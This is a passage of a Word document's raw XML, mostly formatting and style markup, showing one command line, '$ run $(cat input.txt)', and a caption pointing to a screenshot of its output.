        </w:rPr>
        <w:t>$ run $(cat input.txt)</w:t>
      </w:r>
      <w:r w:rsidRPr="003E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003E1763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The output for the preceding command can be seen in the following screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD74629" w14:textId="79AB6649" w:rsidR="003E1763" w:rsidRDefault="003E1763" w:rsidP="003E1763">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F800517" w14:textId="6ED0D6CE" w:rsidR="003E1763" w:rsidRDefault="003E1763" w:rsidP="003E1763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F75611F" wp14:editId="65C26CB2">
            <wp:extent cx="5400040" cy="7010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9D7D" w14:textId="5FB1E65A" w:rsidR="003E1763" w:rsidRDefault="003E1763" w:rsidP="003E1763">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46DEF7F1" w14:textId="77777777" w:rsidR="003E1763" w:rsidRPr="003E1763" w:rsidRDefault="003E1763" w:rsidP="003E1763">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="003E1763" w:rsidRPr="003E1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Mono">
    <w:altName w:val="Cambria"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="LiberationMono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C3"/>
    <w:rsid w:val="000E4DC9"/>
    <w:rsid w:val="001B0FC3"/>
    <w:rsid w:val="00310C99"/>
    <w:rsid w:val="00355195"/>
    <w:rsid w:val="003E1763"/>
    <w:rsid w:val="00693CAD"/>
    <w:rsid w:val="00842A44"/>
    <w:rsid w:val="00A13A99"/>
    <w:rsid w:val="00A9280B"/>
    <w:rsid w:val="00B2677C"/>
    <w:rsid w:val="00C168C9"/>
    <w:rsid w:val="00E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CAAF3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{87D96063-10FF-4D16-A6A8-954AAB8F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2677C"/>
    <w:rPr>
      <w:rFonts w:ascii="LiberationSerif-Bold" w:hAnsi="LiberationSerif-Bold" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:color w:val="000000"/>
      <w:sz w:val="76"/>
      <w:szCs w:val="76"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle21">
    <w:name w:val="fontstyle21"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00B2677C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Fuentedeprrafopredeter"/>
    <w:rsid w:val="00842A44"/>
    <w:rPr>
      <w:rFonts w:ascii="LiberationMono-Bold" w:hAnsi="LiberationMono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 IBM</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>MBI IBM</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-03-18T23:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-19T01:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>